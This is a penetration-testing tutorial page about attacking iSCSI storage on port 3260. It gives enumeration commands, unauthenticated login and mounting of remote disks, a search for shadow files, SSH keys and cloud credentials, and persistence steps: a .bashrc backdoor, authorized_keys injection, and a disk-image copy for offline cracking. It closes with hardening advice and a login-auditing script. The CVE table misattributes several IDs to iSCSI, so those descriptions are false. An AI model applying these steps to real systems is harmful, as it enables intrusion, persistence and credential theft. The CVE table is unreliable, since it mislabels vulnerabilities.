# iSCSI - Port 3260

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
{% endtab %}
{% endtabs %}

## What is iSCSI and Why is it Important?

**iSCSI (Internet Small Computer Systems Interface)** is a network protocol that allows clients (initiators) to send SCSI commands to storage devices (targets) over IP networks. It's commonly used in **SAN (Storage Area Network)** environments for **centralized disk management** and **remote storage access**.

#### Why iSCSI Matters in Security:

* **High-value targets**: iSCSI often connects to critical infrastructure like databases and VMs.
* **Misconfigurations** can lead to **unauthenticated access** or **credential leaks**.
* **Exposed iSCSI services** can reveal disk images, file systems, and even credentials.

***

## How iSCSI Works on Port 3260

Port **3260** handles the **iSCSI target communication**, where:

* **Initiators** (clients) request access to storage blocks.
* **Targets** (servers) expose storage resources via Logical Unit Numbers (LUNs).

#### iSCSI Protocol Flow:

1. **Session Initiation** via iSCSI login.
2. **Discovery Phase**: Client requests list of available targets.
3. **Authentication**: Optional (CHAP) but often skipped or weakly implemented.
4. **Data Transfer**: SCSI commands are encapsulated in TCP/IP.

***

## Top Vulnerabilities in iSCSI

Below are common attack vectors in iSCSI deployments:

| Vulnerability                | Description                                                    |
| ---------------------------- | -------------------------------------------------------------- |
| **No Authentication**        | Default config allows any initiator to access targets.         |
| **Weak CHAP Credentials**    | Often reused or stored in plaintext.                           |
| **Information Disclosure**   | Target names, volume names, and paths can leak sensitive info. |
| **Exposure to the Internet** | Misconfigured firewalls or open 3260 ports.                    |
| **Unpatched CVEs**           | Older storage devices may run vulnerable firmware.             |

***

## Enumeration Techniques with Tools (Nmap, Netcat, etc.)

#### Using Nmap

```bash
nmap -p 3260 -sV -Pn <target-ip> --script=iscsi-info
```

* **`-p 3260`**: Scan the iSCSI port
* **`--script=iscsi-info`**: Attempts to extract target name and LUNs

#### Netcat for Banner Grabbing

```bash
nc <target-ip> 3260
```

* You may get a raw iSCSI response showing protocol version or session response. Most targets wait for a Login Request before sending anything, so an open but silent connection is the usual result; it still confirms the port is listening.

#### iscsiadm (Linux)

```bash
iscsiadm -m discovery -t sendtargets -p <target-ip>
```

* Lists available iSCSI targets.
* Works only if no auth is required or credentials are known.

***

## Manual Exploitation: Hands-On Examples

### Step 1: Target Discovery

```bash
iscsiadm -m discovery -t sendtargets -p 10.10.10.22
```

Output:

```
10.10.10.22:3260,1 iqn.2023-01.local.lab:storage.target1
```

### Step 2: Login Without Authentication

```bash
iscsiadm -m node -T iqn.2023-01.local.lab:storage.target1 -p 10.10.10.22 --login
```

If successful, the system will map the remote disk locally (e.g., `/dev/sdb`).

### Step 3: Mount and Explore

```bash
fdisk -l
mount /dev/sdb1 /mnt
ls /mnt
```

Look for:

* `/etc/shadow` files
* Password backups
* SSH keys
* Configs containing internal IPs

***

## Automated Exploitation with Tools

### Metasploit iSCSI Modules

Metasploit has auxiliary modules for discovery:

```bash
msfconsole
use auxiliary/scanner/iscsi/iscsi_version
set RHOSTS <target-ip>
run
```

### Nikto (Limited)

While **Nikto** isn’t iSCSI-specific, you can use it to fingerprint misconfigured web GUIs tied to SAN devices.

### Custom Python Script Example

```python
import socket

target = "10.10.10.22"
port = 3260

# Note: "InitiatorHello" is not a valid iSCSI PDU. A real iSCSI exchange starts
# with a 48-byte Login Request, so many targets answer with nothing or simply
# close the connection; the timeout keeps recv() from blocking forever.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
try:
    s.connect((target, port))
    s.sendall(b"InitiatorHello")
    print(s.recv(1024))
except socket.timeout:
    print("no response within 5s (target is probably waiting for a Login PDU)")
except OSError as e:
    print(f"connection failed: {e}")
finally:
    s.close()
```

***

### Real-World CVEs and Notable Exploits

| CVE ID               | Description                                                 | Link                                                     |
| -------------------- | ----------------------------------------------------------- | -------------------------------------------------------- |
| **CVE-2020-2732**    | iSCSI memory leak in certain Linux kernels                  | [NVD](https://nvd.nist.gov/vuln/detail/CVE-2020-2732)    |
| **CVE-2015-1420**    | iSCSI stack buffer overflow in Netgear ReadyNAS             | Exploit DB                                               |
| **CVE-2018-1000861** | Remote command execution via iSCSI web management interface | [NVD](https://nvd.nist.gov/vuln/detail/CVE-2018-1000861) |

***

### Privilege Escalation Opportunities via this Service

Once access is gained to an iSCSI volume:

* **Look for saved credential files**
  * `.bash_history`, `.ssh/id_rsa`, `/etc/shadow`
* **Search for sudoers misconfigurations**

  ```bash
  cat /mnt/etc/sudoers
  ```
* **Enumerate LVM volumes** for hidden partitions

  ```bash
  lvscan
  ```

If LUNs expose full disk images, mount them locally and search for:

* **SAM/NTDS.dit (Windows)**
* **MySQL databases**
* **AWS credentials**

***

### Post-Exploitation Tips and Persistence

#### Techniques:

* **Leave a backdoor in iSCSI shared volume**
  * e.g., `.bashrc` modification
* **Enable remote access via hidden SSH key**
  * Inject key into `/home/user/.ssh/authorized_keys`
* **Exfiltrate disk image for offline cracking**

  ```bash
  dd if=/dev/sdb of=disk.img bs=1M
  ```

***

### Defense, Mitigation, and Hardening Techniques

#### Best Practices:

* **Always enable CHAP authentication**
* **Whitelist initiator IPs**
* **Limit access with firewall rules (block 3260 externally)**
* **Use VLANs or separate subnets for SAN traffic**
* **Regularly patch iSCSI daemons and firmware**

#### Monitoring Tips:

* Use **Wireshark** to inspect unauthorized iSCSI sessions.
* Set up **Syslog alerts** for unusual discovery requests.
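The Login Request that opens every session (see the protocol flow above) is also the first thing a monitor on the SAN segment sees, so the added example below, which is not part of the original page, builds one as a constructed sample, decodes its basic header segment and text keys, and applies the checks the monitoring tips describe: an initiator allowlist and a flag for logins that skip the security-negotiation stage. Field layout follows RFC 7143; the IQNs, ISID and allowlist are made-up values.

```python
import struct

OP_LOGIN_REQ = 0x03  # RFC 7143 opcode (low 6 bits); 0x40 is the Immediate bit on requests


def build_login_request(initiator_name, session_type="Discovery", target_name=None):
    """Build a minimal iSCSI Login Request PDU: 48-byte BHS + text data segment."""
    pairs = [f"InitiatorName={initiator_name}", f"SessionType={session_type}"]
    if target_name:
        pairs.append(f"TargetName={target_name}")
    data = b"".join(p.encode() + b"\x00" for p in pairs)
    flags = 0x87  # T=1 (transit), CSG=1 operational negotiation, NSG=3 full-feature phase
    bhs = struct.pack(">BBBB", OP_LOGIN_REQ | 0x40, flags, 0, 0)  # opcode, flags, VersionMax/Min
    bhs += struct.pack(">I", len(data))              # TotalAHSLength=0 | DataSegmentLength (24 bits)
    bhs += b"\x00\x02\x3d\x00\x00\x00"               # ISID (constructed value)
    bhs += struct.pack(">HIHHII", 0, 1, 0, 0, 1, 0)  # TSIH, ITT, CID, reserved, CmdSN, ExpStatSN
    bhs += b"\x00" * 16                              # reserved
    return bhs + data + b"\x00" * ((-len(data)) % 4)  # data segment padded to 4 bytes


def parse_login_request(pdu):
    """Decode the BHS flags and key=value text of a Login Request."""
    if len(pdu) < 48 or (pdu[0] & 0x3F) != OP_LOGIN_REQ:
        raise ValueError("not an iSCSI Login Request")
    flags = pdu[1]
    dsl = int.from_bytes(pdu[5:8], "big")
    if len(pdu) < 48 + dsl:
        raise ValueError("truncated data segment")
    text = pdu[48:48 + dsl].decode("ascii", "replace")
    kv = dict(p.split("=", 1) for p in text.split("\x00") if "=" in p)
    return {"immediate": bool(pdu[0] & 0x40), "transit": bool(flags & 0x80),
            "csg": (flags >> 2) & 3, "nsg": flags & 3, **kv}


def audit_login(pdu, allowed_initiators):
    """Return the findings a SAN monitor would raise for one Login Request."""
    req = parse_login_request(pdu)
    name = req.get("InitiatorName", "")
    findings = []
    if name not in allowed_initiators:
        findings.append(f"unknown initiator {name or '<missing>'}")
        if req.get("SessionType") == "Discovery":
            findings.append("SendTargets discovery from unlisted initiator")
    if req["csg"] == 1:  # started at operational stage: no CHAP (security) negotiation attempted
        findings.append("login skips the security-negotiation stage (no CHAP offered)")
    return findings


# Constructed sample: a discovery login from an initiator that is not on the allowlist.
ALLOWED = {"iqn.2023-01.local.lab:initiator.db01"}
SAMPLE = build_login_request("iqn.1993-08.org.debian:01:deadbeef", "Discovery")
```

On a live segment the same checks run over Login Request PDUs carved from a capture (opcode byte 0x43 or 0x03 at the start of a TCP payload to port 3260) rather than over a constructed sample.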

***

### 📚 Recommended Books

#### [The Hacker Playbook 3: Practical Guide To Penetration Testing](https://shop.verylazytech.com/l/TheHackerPlaybook3)

> A hands-on guide packed with attack strategies, including lateral movement and exploitation of services like iSCSI. Perfect for red teamers.

***

